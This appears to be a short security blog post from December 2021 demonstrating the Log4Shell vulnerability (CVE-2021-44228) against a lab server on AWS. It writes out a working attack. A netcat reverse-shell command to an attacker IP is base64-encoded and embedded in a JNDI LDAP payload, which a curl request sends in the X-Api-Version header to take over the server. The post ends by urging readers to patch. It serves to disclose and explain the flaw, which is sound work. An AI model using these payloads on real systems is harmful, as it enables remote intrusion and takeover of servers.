VXRL

Dec 11, 2021

3 min read

Log4j Demonstration

Researcher: {Alan Ho}

A critical vulnerability for Apache Log4j was discovered and published, it has a huge impact to countless servers.

There are already posts describing the details of the vulnerability (CVE-2021–44228), so we are just going to do a demonstration on how this vulnerability can be manipulated.

We have prepared two servers in AWS, one acts as the vulnerable server which is using exploitable log4j.

vulnerable server
vulnerable server

Another server is running a malicious LDAP server and netcat listener for remote shell.

malicious ldap server
malicious ldap server
listening for remote shell
netcat listener

Since the malicious LDAP server can support base64 encoded commands

ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]

We prepare the command:

nc 3.86.225.135 4444 -e /bin/sh

and base64 encode it

base64 encode the remote shell command

So we have all the servers and command in place, we launch the attack.

curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
launching the attack

The vulnerable server encountered the errors.

errors the vulnerable server

The malicious LDAP server received the command and the vulnerable server is owned.

command received
received the command
profit
Profit! the server is owned.

Video demonstration:

From the simple demonstration, as long as the malicious ldap server is setup, it is easy to launch the attack and own the server.

ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

Please check your applications and update to the version which has fixed the issue.

References: